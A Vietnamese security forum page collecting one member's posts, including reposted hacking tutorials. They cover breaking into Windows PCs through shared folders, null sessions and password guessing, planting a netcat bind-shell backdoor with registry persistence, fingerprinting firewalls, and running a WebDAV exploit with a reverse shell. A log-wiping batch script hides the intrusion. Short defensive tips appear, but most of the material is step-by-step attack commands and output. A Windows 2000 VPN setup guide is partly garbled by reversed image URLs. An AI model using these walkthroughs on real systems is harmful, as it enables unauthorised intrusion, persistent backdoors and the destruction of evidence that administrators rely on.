banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: phuchn71  XML
Profile for phuchn71 Messages posted by phuchn71 [ number of posts not being displayed on this page: 8 ]
 
Máy tui mua lâu rồi . bây giờ có lẽ gọi là đồ cổ . Hôm qua tự nhiên tui cài lại wind98 . cài xong không có card hình . Tui không biết làm thế nào để có cái hình như cũ bây giờ .Ai có thể giúp bạn được không . Hình như khi mua nó cho cái disk driver nhưng mất rồi . Tuui định ra mạng download cái driver nhưng kkhông biết download cái nào . Và cho hỏi luôn khi mở máy ra thì xem tên của nó ở đâu . Thanks  


Nếu là máy cũ dòng PII 333 Mhz trở lên thì nên tăng RAM rồi cài Win2k Pro cho nó tiện, khỏi phải lo Driver.

minh2010 wrote:
các bác ơi cho em hỏi tí nhé:em muốn kéo mạng từ nét về nhà ,nhung kha xa khoang 300m ,lieu co ke o dc ve nha ko zay?em dinh dung khoang 3 cai hub ,cac bac xem ho em voi nhe !!!
thank!!!!! :lol:  


Với khoảng cách như vậy cùng với dây và hub thì bạn nên dăng ký 1 đường ADSL mới kinh tế hơn smilie

300m mình sợ là xa quá, thông thường ADSL cable chỉ nên dài cùng lắm là <170m với loại cable đồng xịn nguyên chất. Còn xa hơn nữa thì chắc không còn tín hiệu đâu.  


Khoảng cách bạn đưa ra không phù hợp smilie

Tác giả: ZENO-HVAOnline

Bài viết này với mục đích chia sẻ,học hỏi,trao đổi kiến thức! Nội dung của bài viết là hack vào PC sử dụng HĐH windows và các phương pháp phòng chống (trong phạm vi kiến thức của tui thôi nha).

Bây giờ chúng ta cùng bắt đầu suy nghĩ những hướng phải đi. Khi bạn Online ( tức kết nối vào Internet) bạn sẽ được ISP gán cho một IP nào đó. Vậy Hacker có biết được IP của bạn không? Câu trả lời là có ( nếu Hacker giao tiếp với bạn,có nghĩa là máy của bạn và máy của hacker có sự kết nối, đồng nghĩa với việc trao đổi các packet,từ các packet có thể biết được địa chi IP nguồn)

Khi biết IP của bạn liệu hacker có thể hack vào máy tính của bạn không? Câu trả lời là hoàn toàn có thể.
Vậy hacker làm như thế nào để Hack?

Hacking thông qua resource share:

Hacker có thể dùng các tool hack tự động ví dụ như : ent3,legion… ( nhưng bản chất của các công cụ này là thưc hiện các bước mà tôi sẽ nói dưới đây 1 cách tự động,chính vì vậy việc dùng các tool này là một cách khá củ chuối …)
Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của bạn.
Chỉ bằng vài dòng lệnh đơn giản trên comand line:



CODE

[C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết )

Shared resources at \\x.x.x.x

Share name Type Used as Comment
-------------------------------------------------------------------------------
C Disk
PRJA3 Disk
The command completed successfully.
C:\> 



Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn nhiều so với NTFS)

Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy Administrator cũng có thể làm được tất cả ( bạn có tin không ?).
Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất cứ lúc nào.

Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy cập vào.
Cũng bằng command line:


CODE


C:\> net use z: \\x.x.x.x \share
The command completed successfully 
.



Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy username & password
Lấy Username :


CODE


C
:\> Nbtstat –A x.x.x.x

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ADMIN <00> UNIQUE Registered
BODY <00> GROUP Registered
ADMIN f <20> UNIQUE Registered
BODY <1E> GROUP Registered
BODY <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-08-A1-5B-E3-8C 



Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY
Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như : pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng phán đoán của hacker ) tên là : pass.txt


CODE


“” ADMIN
123456 ADMIN
123456 BODY
“” BODY
… 


Sau đó hacker crack bang lệnh :
[/CODE]
Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh:


CODE


C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt x.x.x.x.%I>>output.txt  


Đối với Win 2000,XP hacker sẽ không là gì nếu không phải administrator chính vì vậy hacker bằng mọi giá sẽ lấy cho được administrator.
nếu lấy được admin thì việc còn lại thì chờ hacker định đoạt.
Khuyến cáo : không nên share gì hết ( trong trường hợp buộc phải share thì nên đặt password phức tạp 1 chút )
Giả sử rằng máy của Victim không share. Vậy hacker làm sao ?

Trong trường hợp này hacker sẽ đoán user & pass (có thể dùng cách ở trên hoặc dung các tool như: user2sid/sid2user,dumpACL,SMBGrind……) sau đó kết nối tới IPC$ ( mặc định share của windows)


CODE


C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully. 

Trong trường hợp không thê đoán Đươc user & pass hacker có thể thiết lập một Null session tới máy victim:


CODE

C:\> net use \\x.x.x.x\IPC$ “” /user:””
The command completed successfully  

Và rồi nếu victim permission không đúng sẽ có nhưng hậu quả khôn lường.

khuyến cáo : Vô hiệu hoá NetBios ( Bấm vào My Network Places chọn Local Area Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS và bấm vào Disable NetBIOS over TCP / IP), Dùng firewall chặn 1 số port không cần thiết , khoá tài khoản sau 1 số lần đăng nhập thất bại .

Tiện đây cũng nói thêm về điều khiển từ xa ( vì có nhiều bạn đột nhập được vào rùi mà không biết phải làm sao )

Giả sử rằng bạn đã có username,password của admin của máy victim rồi:
giờ thiết lập 1 phiên làm viêc:



CODE

C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully. 



Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor nhưng tôi thấy hơn cả vẫn là : netcat ( nc)
chép nc vào máy victim



CODE

C
:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe
The command completed successfully.
1 file copies 

Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file trên máy victim, mặc đinh khi cài win sẽ chạy service này)



CODE

C:\> sc \\x.x.x.x start schedule
service_name : schedule 


Bây giờ kiểm tra giờ trên máy victim



CODE

C:\> net time \\x.x.x.x

Current time at \\10.0.0.31 is 6/29/2005 4:50 AM

The command completed successfully. 



Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111:



CODE

C:\>AT \\x.x.x.x 4:55 /interactive “c:\windows\nc.exe” –L –d –p111 –e cmd.exe

Added a new job with job ID = 1 

đợi đến 4:55 rồi chạy thử nc.exe



CODE

C:\>nc –nvv x.x.x.x 111

(UNKNOWN) [x.x.x.x] 111 (?) open
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\windows> 


Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe’)
Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy và lắng nghe mệnh lệnh của ta?
Bạn có thể cho netcat khởi động cùng windows. "moi" file netcat.reg (dùng notepad và save lại thành .reg) có nội dung như sau:



CODE

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe" 


Sau đó copy sang máy victim và chạy nha!
Hy vọng mọi người đừng phá hoại nha ! Thân

Tác giả: ZENO-HVAOnline

Tác giả: KiemKhach HVAOnline

1. Tổng quan về tường lửa :

- Theo tớ được biết thì hiện nay trên thị trường có 2 loại tường lửa : ủy nhiệm ứng dụng(application proxies) và cổng lọc gói tin ( packet filtering getways ).

2. Nhận dạng tương lửa

-Hầu hết thì các tường lửa thường có 1 số dạng đặc trưng, chỉ cần thực hiện một số thao tác như quét cổng và firewalking và lấy banner (thông tin giới thiệu-tiêu đề ) là hacker có thể xác định được loại tường lửa, phiên bản và quy luật của chúng.

-Theo các bạn thì tại sao nhận dạng tường lửa lại quan trọng ? và câu trả lời là
Bởi nếu như đã biết được các thông tin đích xác về tường lửa và cách khai thác những điểm yếu này .

a. Quét trực tiếp - kỹ thuật lộ liễu
+ Cách tiến hành
-Một cách đơn giản nhất để tìm ra tường lửa là quét các cổng mặc định. Theo tớ được biết thì một vài tường lửa trên thị trường tự nhận dạng mình bằng việc quét cổng - ta chỉ cần biết những cổng nào cần quét . Ví dụ như Proxy Sever của Microsoft nghe các cổng TCP 1080 va 1745 etc..

Như vậy để tìm tường lửa ta sử dụng nmap đơn giản như sau :

Nmap -n -vv -p0 -p256,1080,1745 192.168.50.1 -60.250

Từ những kẻ tấn công vụng về cho đến những kẻ sành sỏi đều dùng phương pháp quét diện rộng đối với mạng làm việc của bạn để nhận diện tường lửa.Tuy nhiên , những hacker nguy hiểm sẽ tiến hành công việc quét càng thầm lặng , càng kín đáo càng tốt . Các hacker có thềdung nhiều kĩ thuật để thoát khỏi sự phát hiện của chúng ta bao gồm ping ngẫu nhiên ... Các hệ thống dò xâm nhập ( IDS - Intruction Detection System ) không thể phát hiện những hành động quét cổng áp dụng những kĩ thuật tinh vi để lẩn tránh bởi chúng được ngầm định lập cấu hình chỉ để nghe những hành động quét cổng lộ liễu nhất mà thôi .

Trừ khi chúng ta có những thiết lập đúng đắn cho IDS , nếu không việc quét cổng sẽ diễn ra rất âm thầm và nhanh chóng. Chúng ta hoàn toàn có thể tạo ra những hành vi quét cổng như vậy khi sử dụng những đoạn script có sẵn trên nhiều trang web như :
www.hackingexposed.com

*** Cách đối phó ***
Nếu các bồ dùng RealSecure 3.0 thì có thể làm như sau:

-Để RealSecure 3.0 có thể phát hiện ra các hành vi quét cổng , chúng ta cần phải nâng cao tính nhạy cảm của nó , có thể sử dụng những thay đổi sau :
- Chọn Network Engine Policy
- Tìm "Port Scan " và chọn nút Options
- Sửa Ports thành 5 ports
- Sửa Delta thành 60 seconds

- Để ngăn chặn việc quét cổng tường lửa từ Internet ta cần phải khóa các cổng này ở những router đứng trước Firewall.Trong trường hợp những thiết bị này do ISP quản lý, ta phải liên hệ với họ.

b. Lần theo tuyến (Route tracking )-
Sử dụng chương trình traceroute để nhận diện tương lửa trên một mạng làm việc là một phương pháp âm thầm và không khéo hơn. Chúng ta có thể sử dụng traceroute trên môi trường UNIX và tracert.exe trên môi trường Windows NT để tìm đường đến mục tiêu. Traceroute của LINUX có khóa lựa chọn -I để thực hiện việc lần theo tuyến bằng cách gửi đi các gói ICMP

[vtt]$ traceroute -I 192.168.51.100
traceroute to 192.168.51.101 (192.168.51.100), 30 hops max, 40 byte packages
1 attack-gw (192.168.50.21) 5.801 ms 5.105 ms 5.445 ms
2 gw1.smallisp.net (192.168.51.1)
....
15 192.168.51.101 (192.168.51.100)


3.Lấy banner (banner grabbing)

- Quét cổng là một biện pháp rất hiệu quả trong việc xác định firewall nhưng chỉ có Checkpoint và Microsoft nghe trên các cổng ngầm định , còn hầu hết các tường lửa thì không như vậy , do đó chúng ta cần phải suy diễn thêm . Nhiều tường lửa phổ biến thường thông báo sự có mặt của mình mỗi khi có kết nối tới chúng.Bằng việc kết nối tới một địa chỉ nào đó,ta có thể biết được chức năng hoạt động , loại và phiên bản tương lửa. Ví dụ khi chúng ta dùng chương trình netcat để kết nối tới một máy tính nghi nghờ có tường lửa qua cổng 21( F b sờ tê) ta có thể thấy một số thông tin thú vị như sau :
c:\>nc -v -n 192.168.51.129 21
(unknown) [192.168.51.129] 21 (?) open
220 Secure Gateway FTP sever ready

-Dòng thông báo (banner) "Secure Gateway FTP sever ready" là dấu hiệu của một loại tường lửa cũ của Eagle Raptor. Để chắc chắn hơn chúng ta có thể kết nối tới cổng 23 (telnet) :
C:\>nc -v -n 192.168.51.129 23
(unknown) [192.168.51.129] 23 (?) open
Eagle Secure Gateway.
Hostname :

-Cuối cùng nếu vẫn chưa chắc chắn ta có thể sử dụng netcat với cổng 25(SMTP)

C:\>nc -v -n 192.168.51.129 25
(unknown) [192.168.51.129] 25 (?) open
421 fw3.acme.com Sorry, the firewall does not provide mail service to you

-Với những thông tin và giá trị thu thập được từ banner,hacker có thể khai thác các điểm yếu của Firewall( đã dc phát hiện ra từ trước ) để tấn công .

Cách đối phó -
Theo tớ hiểu thì để đối phó thì chugns ta cần phải giảm thiểu thông tin banner, điều này phụ thuộc rất nhiều vào các nhà cung câp firewall. Ta có thể ngăn chặn việc bị lộ quá nhiều thông tin tường lửa bằng cách thường xuyên sủa đổi các file cấu hình banner. Điều này thì các bạn nên tham khảo thêm từ các nhà cung cấp dịch vụ.

4.Nhận diện cổng (port identification)

Một vài firewall có "dấu hiệu nhận dạng " có thể được dùng để phân biệt với các loại tường lửa khác bằng cách hiện ra một sẻi các con số .Ví dụ như CheckPoint Firewall khi ta kết nối tới cổng TCP 257 quản lý SNMP. Sự hiện diện của các cổng từ 256 tới 259 trên hệ thống chính là dấu hiệu báo trước sự có mặt của CheckPoint Firewall-1 , ta có thể thử như sau:

[vtt]# nc -v -n 192.168.51.1 257
(unknown) [192.168.51.1] 257 (?) open
30000003


[vtt]# nc -v -n 172.29.11. 191 257
(unknown) [172.29.11. 191] 257 (?) open
30000000


have a nice day!
Tác giả: KiemKhach HVAOnline


Tác giả: Seamoun - HVAonline

1) Mô tả

Giao thức World Wide Web Distributed Authoring and Versioning (WebDAV) là một tập hợp các mở rộng cho giao thức HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và quản lý file giữa các máy tính trên Internet. Lỗi tràn bộ đệm đã được phát hiện trong một thành phần của Windows 2000 được sử dụng bởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều khiển máy tính

2) Khai thác

Bạn sử dụng chương trình sau webdav của kralor có thể download lại địa chỉ www.coromputer.net
Công việc chuẩn bị là download cái webdav đó về và đặt nc(NETCAT) ở chế độ lắng nghe ở máy tính dùng để tấn công.
Ví dụ

C:\>nx -vv -l -p 53
listening on [any] 53 ... 



Mục đích là listen ở cổng 53 là tưởng lửa không chặn cổng này
Cú pháp webdav <IP của máy chủ IIS> <IP của máy tính dùng để tấn công> <cổng lắng nghe> [padding=1,2,3...]
Ví dụ

C:\> webdav xxx.xxx.xxx.xxx 203.162.118.56 53 1
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer

Checking WebDav on 'xxx.xxx.xxx.xxx' ... FOUND
exploiting ntdll.dll through WebDav [ret: 0x00100010]
Connecting... CONNECTED
Sending evil request... SENT
Now if you are lucky you will get a shell. 


Nếu như may mắn bạn có thể có shell của máy chủ IIS
Công đoạn khai thác khi đã có shell
Nếu như ở máy tính dùng để tấn công hiện ra kết quả như sau thì bạn đã có shell rồi đó

C:\>nc -vv -l -p 53
listening on [any] 53 ...
connect to [203.162.118.56] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp. 

C:\WINNT\system32> <-- OK đã thành công rùi. Hà hà đã quá !!!



Công đoạn tiếp theo là phải xoá dấu vết của mình. Để thuận tiện cho việc khai thác server các bạn nên up một số đồ nghề thông dụng để quá trình khai thác được dễ dàng hơn khi đã có shell. Mình thường dùng ps, reg, kill, rar, wg, ce ...
Để thuận tiện cho lần sau viếng thăm server các bạn có thể đặt vài con backdoor. Ví dụ như WinShell, Hack Defensed
Hoặc dùng backdoor của VICKI (VKDT) các you có thể download tại đây http://vicki.host.sk/tyt.zip

+ Tìm thư mục ghi nhật ký của máy chủ IIS
Thực hiện truy vấn sau:

C:\WINNT\system32>reg query HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters /v LogFileDirectory
! REG.EXE VERSION 2.0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters
LogFileDirectory REG_SZ C:\WINNT\System32\LogFiles
Thường thì file log lưu ở thu mục C:\WINNT\System32\LogFiles
 

C:\WINNT\system32>at
The service has not been started. ' dịch vụ hẹn lịch đã bị admin vô hiệu

C:\WINNT\system32>net start schedule ' khởi động dịch vụ hẹn lịch
net start schedule
The Task Scheduler service is starting.
The Task Scheduler service was started successfully.

Thực hiện một kịch bản trên server bằng cách lưu tiến trình thực hiện vào một file .bat
Công việc của mình gồm có:
- Dừng máy chủ IIS
- Xoá nhật kí của IIS
- Khởi động lại IIS
- Xoá nhật ký của Event Log
- Xoá file sm.bat(file viết kịch bản khai thác. Hì hì)
Mọi công việc thực hiện bằng các lệnh như sau
C:\WINNT\system32>echo iisreset /stop >sm.bat ' dừng IIS
C:\WINNT\system32>echo rd /q /s C:\WINNT\System32\LogFiles >>sm.bat ' xóa nhật kí của IIS
C:\WINNT\system32>echo iisreset /start >>sm.bat ' khởi động lại IIS
C:\WINNT\system32>echo ce >>sm.bat ' xóa nhật kí của Event Log
C:\WINNT\system32>echo del sm.bat >>sm.bat ' xóa file sm.bat

C:\WINNT\system32>net time \\xxx.xxx.xxx.xxx ' lấy thời gian hiện tại của máy chủ
Current time at \\xxx.xxx.xxx.xxx is 3/25/2003 3:00 PM

The command completed successfully.

C:\WINNT\system32>at 15:05 sm.bat ' đặt lịch sau 5 phút nữa sẽ làm việc
at 15:05 sm.bat
Added a new job with job ID = 1

C:\WINNT\system32>exit ' đóng kết nối
sent 207, rcvd 746 


Như vậy mọi hành động của bạn thực hiện trên máy chủ IIS sẽ không bị ADMIN phát hiện. Hì hì. Nếu như các bạn để máy chủ tình trạng ngưng hoạt động chờ sự khởi động của ADMIN có thể dẫn đến ADMIN nghi ngờ có sự xâm nhập từ bên ngoài. Do vậy mình khuyên các bạn viết kịch bản khai thác như trên. Bạn nào nghĩ ra kịch bản hay hơn thì có thể gửi lên để mọi người cùng thảo luận !

Bản sửa lỗi này tại

http://microsoft.com/downloads/details.asp...&displaylang=en
Chúc các bạn thành công !!! (Server Việt Nam patch hơi bị nhiều đấy các bạn chắc hổng khai thác được đâu mà nếu có khai thác được cái nào thì nên báo cho ADMIN biết về lỗi này. Các bạn đừng có quậy à nha !)

Tác giả: Seamoun - HVAonline

123
Tác giả: (Someone)

Virtual Private Networks (VPN) hay gọi theo tiếng Việt là Mạng Riêng Ảo, cho phép bạn mở rộng phạm vi mạng nội bộ bằng cách sử dụng lợi thế của internet. Kỉ thuật VPN cho phép bạn kết nối với một host nằm xa hàng ngàn dặm với mạng LAN của bạn và làm cho nó trở thành một node hay một PC nữa trong mạng LAN. Một đặc điểm nữa của VPN là sự kết nối giữa clients và mạng ảo của bạn khá an toàn như chính bạn đang ngồi trong cùng một mạng LAN.

Các hệ điều hành Windows 2000 Server cho phép bạn thiết lập VPN server bằng cách sử dụng lợi thế có sẳn trong RRAS (Remote Routing Access Service). Sau khi thiết lập một server thành VPN server thì các clients có thể gọi vào và truy cập những tài nguyên trong mạng nội bộ hay còn gọi là LAN như là đang kết nối trực tiếp với network đó.
VPN Clients Thế nào là VPN client? VPN clients có thể là bất kì một computer nào sử dụng hệ điều hành từ Win9x, Windows NT Workstation hay là Windows 2000 Professional. Ngay cả server cũng có thể là VPN clients. Cách làm việc giữa client computer và server như thế nào? Cách đơn giản và thong dụng nhất là client computer khởi tạo một kết nối với ISP bằng giao thức PPP (Point to Point Protocol). Sau khi kết nối theo dạng này còn được gọi là “Non-Virtual” kết nối không ảo ở tầng datalink, client có thể sử dụng giao thức PPP này một lần nữa để thiết lập một kết nối ảo với VPN server và từ đây nó có thể trở thành một node hay một máy trạm trong hệ thống LAN.
Lưu ý: Khi client kết nối được với VPN server, thực tế nó vẫn đang kết nối với internet. Tuy nhiên, sau khi thiết lập được kết nối VPN với VPN server, thì client hay máy trạm sẽ tự động tìm kiếm một địa chỉ IP mà địa chỉ IP này phải trùng hay nói đúng hơn là phải cùng subnet với mạng ảo mà nó kết nối tới, sự kết nối này sẽ tạo ra một interface ảo hay là một cạd mạng ảo. Card mạng ảo này sẽ thiết lập một gateway mặc định.
Cách cài đặt VPN Server Trước khi client có thể gọi vào hoặc có thể truy cập được vào mạng của bạn, bạn cần phải cài đặt VPN server. Trong bài này chúng ta sẽ cùng nhau tìm hiểu cách cài đặt một VPN Server như thế nào cũng như sẽ điểm qua một vài vấn đề quan trọng trong hệ thống hạ tầng của giải pháp mạng ảo VPN.
Bước đầu tiên là enable Routing and Remote Access Service (RRAS). Bước này thì bạn không cần phải cài đặt vì nó đã được cài đặt sẳn khi bạn cài đặt hệ điều hành Windows. Tuy nhiên mặc dù đã được cài đặt theo windows nhưng nó chưa được enable, cho nên để có thể enable RRAS thì bạn có thể làm theo các bước sau đây:

1. Chọn start, chọn Programs, chọn Administrative Tools, chọn Routing and Remote Access (RRAS).
2. Trong Routing and Remote Access console, right click tên server của bạn, và chọn Enable Routing and Remote Access. Sau khi chọn như ở trên nó cần khoảng vài giây để activate.
3. Sau đó RRAS Wizard sẽ khơi động. Trong phần này bạn nên chọn mục Manually configured server và click Next theo hình dưới đây.

bmuht_gpj.89092_4babe42e3fdad65315473fd1cbe6b31f/6/7/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptth

4. Bạn cứ tiếp tục làm theo sự chỉ dẫn trên wizard cho tới khi bạn hoàn tất phần wizard, và cuối cùng là chọn Finish để hoàn tất phần enable RRAS.
5. Sau khi hoàn tất phần enable RRAS bạn cần phải restart service, bạn chỉ chọn Yes.

Lưu ý: Chúng ta không sử dụng mục Virtual private network (VPN) server vì có một trở ngại là khi chọn mục này, nó sẽ bảo vệ cái interface mà bạn chọn bằng cách cài bộ lọc mà chỉ cho phép hai giao thức căn bản là L2TP và PPTP được quyền truyền tải dử liệu, RRAS sẽ không truyền tải nếu nó không phải là giao thức trên, đó là lý do nên sử dụng mục Manually configured server. Khi RRAS bắt đầu làm việc thì bạn sẽ thấy như tấm hình dưới đây.

[img]http:/bmuht_gpj.89092_87d24aa67d344c3169c9310c07751e6a/6/7/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptth
Phần General Tab Right click vào server name của bạn và chọn Properties theo hình dưới đây.

[img]http://www.htmlonlbmuht_gpj.89092_2a2b844a1feee17eed02dce48c30e140/6/7/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptth phần Properties trên bạn có thể chọn vào mục Router vì computer của bạn sẽ chịu trách nhiệm chuyển tải những yêu cầu từ VPN clients với lại mạng nội bộ LAN, đó là lý do bạn cần phải chọn vào mục router. Phần làm việc của mục router này là route traffic trực tiếp giữa mạng LAN và những máy truy cập thông qua kết nối theo dạng demand-dial. Nếu bạn muốn VPN theo dạng gateway-to-gateway VPN, bạn nên chọn mục Router và luôn cả mục LAN and demand-dial routing.
Bạn nhớ chọn thêm mục Remote access server. Nếu bạn không chọn mục này thì VPN client không thể gọi vào được. The Server "IP" Tab Chọn vào mục IP tab như hình dưới đây. Chọn vào mục Enable IP routing, mục này cho phép clients được quyền truy cập vào mạng nội bộ của bạn, nếu bạn không chọn mục này thì các clients chỉ có thể truy cập vào VPN server mà thôi. Mục Allow IP-based remote access and demand-dial connections phải được enable để các clients có thể cấp phát địa chỉ IP khi client truy cập. Khi bạn chọn mục này có nghĩa là bạn cho phép giao thức điều khiển IP (IPCP), giao thức này được sử dụng để thiết lập kết nối theo dạng PPP. Bước kế tiếp là bạn cần phải quyết định số IP cấp phát cho VPN clients như thế nào. Bạn có hai cách cấp phát IP
• Dynamic Host Configuration Protocol (DHCP) IP động.
• Static Address Pool IP Tĩnh

Theo kinh nghiệm thì nên chọn DHCP vì không cần phải mệt óc chia và cấp phát thế nào cho clients. Khi DHCP server được configure với một scope địa chỉ IP cho card LAN của VPN server, thông thường by default RRAS/VPN server có khoảng 10 ports để cho phép tạo kết nối, vì vậy nó sẽ chôm khoảng 10 IP address của DHCP server và nó sẽ sử dụng một cho chính nó. Nếu tất cả IP address đều được sử dụng hết bởi các kết nối VPN và nếu VPN server của bạn có nhiều hơn 10 ports thì nó sẽ lấy thêm 10 IP addresses nữa từ DHCP server để sơ cua cho các truy cập sau. Cách dễ nhất để giải quyết địa chỉ IP cho client là đặt DHCP server trong cùng một subnet với VPN server interface. Bạn có thể thiết lập DHCP Relay Agent, tuy nhiên phần này sẽ đề cập ở mục khác. Nếu như bạn sử dụng IP tĩnh để cho phép client tạo kết nối thì phải bảo đảm rằng nó phải cùng subnet với mạng nội bộ của VPN server hay là internet interface của VPN server. Còn không thì hơi phiền phức. Ở phần cuối của hình dưới bạn chọn vào mục Use the following adapter to obtain DHCP, DNS, and WINS addresses for dial-up clients, ở đây bạn nên chọn NIC card còn lại của VPN server, vì là client khi kết nối với mạng VPN của bạn, nó cần phải nằm trong cùng mạng LAN, cho nên bạn phải chọn NIC card của RRAS server vì NIC card này sẽ chịu trách nhiệm cung cấp các thông tin về DHCP, DNS và WINS cho client.

[img]/hvabmuht_gpj.89092_3a3764400967d40f882d2944c2f408d8/6/7/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthn xong thì click OK để tiếp tục phần configure ports như hình dưới đây.

[img]/hvaonline/uplobmuht_gpj.89092_5fc5efbf17cc3b8a7053217d9d5f32de/6/7/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptth/b> Trong phần RRAS Console, bạn right click vào Ports, chọn Properties như hình dưới đây.
[img]/hvaonline/upload/2006/7/6bmuht_gpj.89092_68c5f782413fed4d74914c60b3bef880/6/7/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptth phần Ports Properties như hình dưới đây. Chọn VPN interface mà bạn muốn enable, ví dụ như bạn muốn enable giao thức PPTP để client có thể tạo kết nối với mạng VPN, giao thức PPTP tương đối là đơn giản nhất, cho nên bạn nên bắt đầu bằng giao thức này bằng cách chọn WAN Miniport (PPTP) sau đó nhấn vào mục Configure như hình dưới đây.

Trong phần configure WAN Miniport (PPTP) như hình dưới, bạn nên chọn mục Remote access connections (inbound only) để clients có thể tạo kết nối với VPN server. Mục Demand-dial routing connections (inbound and outbound) cho phép RRAS server được phép khởi tạo hoặc là chấp nhận kết nối đến và từ demand-dial routers. Nếu bạn muốn thực hiện giải pháp gateway-to-gateway VPN solution, thì bạn nên chọn mục này, nhưng nếu bạn chỉ muốn cho phép nhận kết nối từ clients thôi thí bạn có thể disable thư mục này. Trong hộp Phone number for this device, nhập vào địa chỉ IP của VPN server interface như hình dưới.

[img]/hvaonline/upload/2006/7/6/2a42fe509bbmuht_gpj.89092_dcd9b1b5f1701996a0f7d3b905ef24a2/6/7/6002/daolpu/enilnoavh/ten.enilnoavh.www//:ptthbao nhiêu ports cũng được tùy theo nhu cầu của bạn, ports thì có tổng cộng khoảng 16384 ports, cho nên nếu bạn có nhu cầu nhiều hơn số lượng ports đó thì bạn phải cần thêm một VPN server.


Click OK. Nếu bạn chọn ít hơn số port mặc định thì bạn sẽ gặp lời cảnh cáo như hình dưới đây, nhưng không sao bạn cứ việc click Yes. Sau đó click Apply trong phần Port Properties.



Bước cuối cùng là cho phép truy cập qua Remote Access Policy. Chọn vào thư mục Remote Access Policy, bên tay phải bạn right click vào mục Allow access if dial-in permission is enable chọn properties như hình dưới.

[img]/hvaonline/upload/2006/7/6/d0101d6b48b14356128dfbmuht_gpj.89092_f555c140baafd82165341b84b6d1010d/6/7/6002/daolpu/enilnoavh/ten.enilnoavh.www//:pttherties, chọn vào mục Grant remote access permission. Mục này cho phép users truy cập bất cứ lúc nào miễn là khớp với điều kiện đặt ra của Policy Change the If a user matches the conditions setting to Grant remote access permission như hình dưới sau đó. Click Apply and then click OK.

[img]/hvaonline/upload/2006/7/6/ae8409a67a4f0c5cc9b4333db362f1e8bmuht_gpj.89092_8e1f263bd3334b9cc5c0f4a76a9048ea/6/7/6002/daolpu/enilnoavh/ten.enilnoavh.www//:pttht VPN server. Thật ra cách thiết lập một VPN server như chúng ta vừa làm thuộc dạng đơn giản đủ để cho phép clients tạo các kết nối với VPN server. Tuy nhiên một khi bạn đã có thể bảo đảm rằng VPN server của bạn đã làm việc một cách tốt đẹp bằng cách bạn tạo một kết nối thử nghiệm từ ngoài vào, nếu thành công thì bạn hãy bước một bước kế tiếp kỹ thuật hơn cũng như gia tăng bảo mật. Windows 2000 RRAS Server rất mạnh và cũng là một chương trình phần mềm chẳng đơn giản chút nào. Có rất nhiều options trong cái RRAS console này, nếu bạn biết cách phát huy hay sử dụng nó đúng thì sẽ tạo cho bạn rất nhiều thích thú. Tốt nhất khi thiết lập bất cứ server loại nào, điều bạn nên nhớ đầu tiên là cố gắng đơn giản việc thiết lập để chắc chắn rằng những cái chúng ta vừa thiết lập đã hoạt động căn bản rồi

em đã làm như bác phuc nói nhưng em không hiểu "Mở khoá cho phép logon trên registry" là thế nào. cái sever service em cho nó restart rồi nhưng vẫn vậy. em thử tắt hết firewall trong các máy đi nhưng mờ vẫn không dc. còn cái vụ setup network thì làm nhiều quá rồi  


bạn tham khảo bài giới thiệu về registry tại đây: /hvaonline/posts/list/34.html lưu ý phần logon.

Bác Phúc em toàn dùng từ ngữ kỹ thuật đao to búa lớn làm em nó chả hiểu giề ) Thiệt tình em cũng chả hiểu câu bác nói "mở khóa cho phép logon trên registry" là gì. Em thật.  
